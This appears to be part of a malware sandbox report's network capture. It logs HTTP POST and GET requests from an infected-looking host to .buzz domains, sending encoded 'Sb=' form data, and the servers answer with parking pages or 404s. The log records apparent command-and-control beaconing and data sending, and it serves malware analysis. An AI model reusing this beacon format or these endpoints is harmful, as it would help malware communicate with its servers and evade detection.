                                                                                        64192.168.11.2049779199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:29.765141964 CET2578OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 72 39 71 76 32 67 4e 46 31 6d 6f 39 6d 37 59 4e 4f 6a 49 36 6a 72 4d 76 72 68 34 55 4c 62 49 53 2b 51 69 56 70 53 4a 63 6a 53 34 6e 31 7a 75 41 65 75 49 57 41 66 6e 48 5a 46 57 70 61 46 31 33 6b 53 70 71 36 54 53 5a 42 73 61 78 48 39 38 6b 57 54 53 53 6f 56 51 51 48 70 46 42 32 2b 42 37 46 70 53 74 61 55 39 6d 74 45 55 7a 51 6e 42 36 66 41 4b 77 63 68 62 2b 75 78 43 38 32 58 34 4c 54 55 52 2b 6d 45 76 2f 53 57 4d 2b 2b 38 48 58 4c 57 4c 33 61 34 61 4d 49 70 4b 78 2b 76 46 79 49 58 44 59 33 57 44 55 76 39 30 6a 65 30 41 4d 4a 36 6c 2f 38 51 4f 41 31 64 52 53 68 2f 48 77 44 77 73 67 57 4c 6d 6d 38 6a 33 59 37 47 6d 4e 55 38 69 76 48 49 4b 4b 36 35 6a 5a 46 41 54 41 54 71 42 66 43 4c 62 56 6c 4f 78 2f 47 6c 74 42 77 32 68 41 63 67 48 59 43 62 70 41 57 7a 79 44 33 4c 78 6a 6f 77 41 41 6e 56 46 76 6a 4d 6f 62 6a 64 64 79 37 47 6d 58 6b 79 34 55 4f 77 4c 58 61 33 30 39 64 66 50 41 6e 6a 47 33 36 74 4f 41 55 38 38 70 44 69 32 4b 53 6d 55 76 61 38 70 75 6f 64 6b [TRUNCATED]
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbIS+QiVpSJcjS4n1zuAeuIWAfnHZFWpaF13kSpq6TSZBsaxH98kWTSSoVQQHpFB2+B7FpStaU9mtEUzQnB6fAKwchb+uxC82X4LTUR+mEv/SWM++8HXLWL3a4aMIpKx+vFyIXDY3WDUv90je0AMJ6l/8QOA1dRSh/HwDwsgWLmm8j3Y7GmNU8ivHIKK65jZFATATqBfCLbVlOx/GltBw2hAcgHYCbpAWzyD3LxjowAAnVFvjMobjddy7GmXky4UOwLXa309dfPAnjG36tOAU88pDi2KSmUva8puodkP7LWMGs3ti6Spu51uvlJovECcgbGtsy4GWqzRCSUkZjVdlLEyOMxIaAdAxpL4lBLw06n0xnzPdjEoOJ7QcUYTle0eHVeItFL8uc9UBu9REMpt3aI64JFETDYzHp/DlVCiltlcGp0nmmRBwDt7k0hB0FZRBXsLTxMyp5yyQk5RSwUGGn7e6nTd/SnPEc18fA4QQUiM3ahw99DXpyG1pzLJQrkmO8g/0XFmbOcsDOXcFLfXow+c5eSb3e11DYxPBDEobvoTlicMGYTZMjN+N6WHxP6QtP/K4E+Buy/ESyWq372YOXUg8IUrkiRZyxodqCJ4xGF5say1+esJy3aE4MZMPhzH+/CIwEZCG3c3qhYoALwBt/tKJXeuTr14vSx40gSasA/BTocWqzc3G+kWirFNS3m9l5U2oMMpENIVnx4ouSTZdrJ5pO2vwGSIuKdcIOoL/uhRUpsGz/P5zDmq2rOMaBIriUbGk0elfwynGSHuxCc+kHd9pJqn3SM8FQAh9SMFM7+3kacM9y2/vl5GComCG82nwsaY9x8KhmtamU4fYwfBhxY/rwLqPVnnbGAAM0Kv8ZqC0nu0bR886oTLmA9aaGiLukGyq1OeWEeBk45g+g4aRzulTYGYdJblyWDloKqRSTa7090B749RL01nv12ltGUU1kDEdSGKM [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:29.765193939 CET5259OUTData Raw: 46 56 67 48 4e 46 36 79 33 76 58 6d 4d 4f 73 76 38 43 39 44 32 61 49 30 59 4f 59 74 50 72 47 46 42 52 67 2f 48 6b 75 39 45 36 6e 44 48 53 4a 43 62 61 58 31 50 68 42 69 77 4b 62 67 47 31 6e 70 6f 75 42 30 53 64 56 55 79 69 7a 71 6a 45 70 64 7a 67
                                                                                        Data Ascii: FVgHNF6y3vXmMOsv8C9D2aI0YOYtPrGFBRg/Hku9E6nDHSJCbaX1PhBiwKbgG1npouB0SdVUyizqjEpdzgPU/BpJd1V7ofrD6a8Yrz8pOklgpHc2qTgqlc+ZwFjCvStaA7+jS8onojXuHry3MIwFG1W2vK1A7n9N09qxMQM5mSRwrBq9Hf9LAzxP0tDQS5fmLuq+SI3gCV3f/27tdQuNA9s0QPcsLMYQ1CkdWz8e913fXazrDs+
                                                                                        Dec 12, 2024 21:58:29.896634102 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:28 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 722d4ad1-1042-4034-b96d-60c607a0734b
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=722d4ad1-1042-4034-b96d-60c607a0734b; expires=Thu, 12 Dec 2024 21:13:29 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:29.896645069 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzIyZDRhZDEtMTA0Mi00MDM0LWI5NmQtNjBjNjA3YTA3MzRiIiwicGFnZV90aW1lIjoxNzM0MDM3MTA5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.11.2049780199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:32.421183109 CET390OUTGET /emhd/?Sb=Y3wtcJEoAby1p+bk3zYE+S80u8VCADM8sIJ2uwsESb9JsS+UnBQfnVhf+jS3LtVrLL+QWmPwAmdepwRhozi7BsCDIfZRcDeIjksRC4QWquR1OPmKeFcOon4=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:32.553239107 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:31 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1478
                                                                                        x-request-id: 522c8a56-7bd6-417d-a0b2-16af8e63ee32
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==
                                                                                        set-cookie: parking_session=522c8a56-7bd6-417d-a0b2-16af8e63ee32; expires=Thu, 12 Dec 2024 21:13:32 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 5a 33 75 4c 4e 74 39 72 58 62 48 57 30 6b 36 50 56 35 4a 5a 35 45 54 62 2f 64 49 53 45 63 53 54 2b 71 4d 30 4e 62 39 49 76 7a 6e 6c 57 6f 7a 4f 47 66 70 6e 6f 4c 47 71 73 4c 51 4e 79 64 4c 43 79 51 50 6d 47 64 75 70 4a 68 64 30 68 42 32 47 41 53 52 32 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AZ3uLNt9rXbHW0k6PV5JZ5ETb/dISEcST+qM0Nb9IvznlWozOGfpnoLGqsLQNydLCyQPmGdupJhd0hB2GASR2Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:32.553251982 CET878INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTIyYzhhNTYtN2JkNi00MTdkLWEwYjItMTZhZjhlNjNlZTMyIiwicGFnZV90aW1lIjoxNzM0MDM3MTEyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.11.2049781172.67.131.14480
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:37.686052084 CET644OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 4c 33 33 46 63 77 62 49 79 33 56 74 30 47 79 34 37 32 79 37 54 76 44 46 76 51 4a 61 6e 48 5a 6f 41 77 45 43 43 72 46 31 57 69 6c 75 6f 69 56 37 75 2b 6b 6d 6f 6a 58 7a 35 75 58 42 73 72 54 73 49 6c 55 77 44 6d 69 2b 32 6e 78 33 69 51 37 61 4f 36 6e 58 4f 36 67 4a 47 44 6e 37 78 74 74 55 62 4e 47 50 30 30 55 44 4f 42 30 47 6a 52 73 38 4a 45 62 32 51 44 77 54 67 50 64 2b 32 71 32 50 69 62 71 2f 38 58 2f 57 73 75 46 45 50 66 57 33 51 2b 63 4d 4a 56 62 54 6c 41 2f 67 76 79 76 64 55 30 53 65 6c 75 75 79 73 39 4e 52 61 62 72 6e 4f 79 4d 68 72 41 3d 3d
                                                                                        Data Ascii: Sb=aMSFOt46gPEmL33FcwbIy3Vt0Gy472y7TvDFvQJanHZoAwECCrF1WiluoiV7u+kmojXz5uXBsrTsIlUwDmi+2nx3iQ7aO6nXO6gJGDn7xttUbNGP00UDOB0GjRs8JEb2QDwTgPd+2q2Pibq/8X/WsuFEPfW3Q+cMJVbTlA/gvyvdU0Seluuys9NRabrnOyMhrA==
                                                                                        Dec 12, 2024 21:58:37.998291016 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXHEKA1dPN3EQEVTjcac%2Bg%2BBetujXOLh3AFwT0PWbgmAo0eqzHKnRP9wBcPNV1IWwbnSand4F1IgHf1Zp312WjzJgPnvOUh26Lmh0g9ago2HO2pOr92MBTxW4vM51PitNhH5"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a231ebfdb0cf-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=114529&min_rtt=114529&rtt_var=57264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=644&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 264OkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &eX
                                                                                        Dec 12, 2024 21:58:37.998305082 CET162INData Raw: 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a 08 1c 09 d3 61 46
                                                                                        Data Ascii: TY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb
                                                                                        Dec 12, 2024 21:58:37.998315096 CET15INData Raw: 61 0d 0a 03 00 b7 30 52 23 cb 05 00 00 0d 0a
                                                                                        Data Ascii: a0R#
                                                                                        Dec 12, 2024 21:58:37.998323917 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        67192.168.11.2049782172.67.131.14480
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:40.322887897 CET664OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 79 4a 6f 42 55 55 43 44 70 39 31 66 79 6c 75 39 53 56 2b 68 65 6c 71 6f 6a 62 52 35 76 72 42 73 72 33 73 49 6c 45 77 44 52 32 35 33 33 78 31 70 77 37 45 51 4b 6e 58 4f 36 67 4a 47 44 6a 42 78 74 46 55 61 2b 65 50 31 56 55 43 51 78 30 46 30 68 73 38 65 55 62 79 51 44 77 68 67 4e 6f 6c 32 6f 2b 50 69 5a 79 2f 38 6a 72 56 37 2b 46 47 4d 76 58 4f 5a 4e 4e 53 4d 6e 37 75 70 6a 58 4a 31 43 76 57 52 69 66 45 34 63 61 57 76 75 52 6a 65 72 53 50 4d 77 4e 36 32 4f 54 6d 77 4c 5a 57 44 37 44 4e 57 4a 4a 54 42 52 36 69 41 5a 55 3d
                                                                                        Data Ascii: Sb=aMSFOt46gPEmITzFbXPI0XVuxGy4imy3TvPFvR9KmyJoBUUCDp91fylu9SV+helqojbR5vrBsr3sIlEwDR2533x1pw7EQKnXO6gJGDjBxtFUa+eP1VUCQx0F0hs8eUbyQDwhgNol2o+PiZy/8jrV7+FGMvXOZNNSMn7upjXJ1CvWRifE4caWvuRjerSPMwN62OTmwLZWD7DNWJJTBR6iAZU=
                                                                                        Dec 12, 2024 21:58:40.638175011 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:58:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rWyklwtTKzJeSATVvAr8be2jmCSNT7QKNIvkJ8jMC%2BwyUmMbhQa7jT0uQUPp21%2FZ3CXnAsL7idT7CbEpwC9n8fTye2NJGsOiLEYoxP4mjoSiIEU8KJ6VIg%2BotUWUTNVO%2BIcg"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f10a2426a9d6747-ATL
                                                                                        Content-Encoding: gzip
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=113978&min_rtt=113978&rtt_var=56989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=664&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                        Data Raw: 32 36 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac d4 4f 6b 13 41 14 00 f0 fb 7e 8a 21 97 24 07 67 89 39 58 4c 13 51 cf 45 82 82 e7 c9 ee 4b 32 ed 76 66 33 33 9b 4d ea 06 3c 28 a6 7f d4 16 7a 50 69 c1 8a d0 1e 24 0a 12 2a 62 f4 cb b8 f9 73 f2 2b c8 6c 36 35 84 2d 86 d2 cb b2 fb de be 79 6f 7f 33 ec aa b4 04 75 15 52 6d 17 8a 29 05 2d 65 ae 93 26 99 46 53 25 03 21 84 6a dc 07 ab 4e 54 26 5b 88 9e ab 1e b3 14 e5 6c 2e 81 9e 44 19 84 9a 44 20 8f a0 22 62 a4 49 6b 44 71 81 3d 09 e2 6e 0d 98 2a cc bd 43 e5 63 a0 2d ca 50 11 79 04 53 66 43 eb 41 35 93 5e a3 96 e0 6b 20 25 b0 1a 88 74 16 95 d0 8d dc ac ce 34 d1 f0 cd e7 f0 67 ef f7 af 93 61 ff f5 f8 b4 1b be 3d 8b 73 b4 8a 32 b3 35 f5 34 3e 65 36 f7 b1 c3 2d a2 47 c5 75 01 55 54 44 e9 ba 52 ae bc 6d 9a 92 2a c0 d4 cd e5 57 b0 c5 37 4d df f7 f1 7a 5b d6 21 b7 82 2b de d6 56 ba a0 bb 4d 5b 8d cf bf 8e 07 9f e2 3e 1d 63 7a 5d 35 a7 44 25 63 75 29 c1 46 c3 71 1a 09 80 71 fc 0a 7e 51 e5 02 5f b9 7c 4f 70 5f 5e 22 57 2e 27 ab 45 2b fd 0f 6d 59 b3 72 f9 7a bc 3c 22 [TRUNCATED]
                                                                                        Data Ascii: 26eOkA~!$g9XLQEK2vf33M<(zPi$*bs+l65-yo3uRm)-e&FS%!jNT&[l.DD "bIkDq=n*Cc-PySfCA5^k %t4ga=s254>e6-GuUTDRm*W7Mz[!+VM[>cz]5D%cu)Fqq~Q_|Op_^"W.'E+mYrz<"6xE/K>ew/U[d\@K=7%$ 7\X9AV0[pj>T[;.C(lu &e
                                                                                        Dec 12, 2024 21:58:40.638190985 CET176INData Raw: d4 a4 58 81 54 99 8b c6 59 3d a0 f6 dd de 1d 1e 7d 1f 1d 9e 0d bb e7 7f 7e ec 4d 5e bc 0c 7b ef c2 fd 83 b0 fb 25 4e 6d 77 47 83 83 f0 f8 e9 65 c4 a9 98 b8 0d 12 e7 b1 e5 70 cf ae 3a 44 00 75 23 ea bc 6d 46 7b 8c dd ba 7b 67 d1 3d 55 30 3a 08 1c
                                                                                        Data Ascii: XTY=}~M^{%NmwGep:Du#mF{{g=U0:aFauiF=Ir!y?nO0pbb0R#
                                                                                        Dec 12, 2024 21:58:40.638210058 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.11.2049783172.67.131.14480
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:42.963151932 CET2578OUTPOST /1lpi/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.jyshe18.buzz
                                                                                        Origin: http://www.jyshe18.buzz
                                                                                        Referer: http://www.jyshe18.buzz/1lpi/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 61 4d 53 46 4f 74 34 36 67 50 45 6d 49 54 7a 46 62 58 50 49 30 58 56 75 78 47 79 34 69 6d 79 33 54 76 50 46 76 52 39 4b 6d 78 70 6f 42 6a 38 43 44 4f 52 31 4e 69 6c 75 68 43 56 2f 68 65 6c 6e 6f 6a 44 56 35 76 6e 52 73 70 66 73 4b 47 63 77 42 6b 61 35 38 33 78 31 6d 51 37 5a 4f 36 6e 43 4f 35 49 4e 47 44 7a 42 78 74 46 55 61 34 79 50 38 6b 55 43 53 78 30 47 6a 52 73 67 4a 45 62 4b 51 44 6f 78 67 4f 46 51 33 5a 65 50 69 35 69 2f 76 67 44 56 34 65 46 59 4a 76 58 2f 5a 4e 42 7a 4d 6e 6e 59 70 69 6a 6a 31 44 6e 57 51 6b 71 31 69 64 32 63 37 6f 74 32 56 4b 65 71 46 44 64 50 37 4e 50 46 77 74 38 2b 4e 4f 72 46 59 4a 46 6a 64 55 75 39 57 2b 4a 4e 7a 42 37 43 34 4d 65 48 5a 4d 38 53 32 31 35 70 48 6a 4a 43 53 70 47 66 39 69 79 4a 64 75 73 32 33 45 32 47 49 58 63 68 30 7a 2f 30 73 4d 5a 49 6c 48 67 76 32 54 75 38 41 50 34 57 73 64 39 75 79 38 4e 2f 79 44 4c 50 68 41 2b 6f 69 4b 6e 66 7a 57 50 63 2f 47 2f 51 2b 56 68 76 63 55 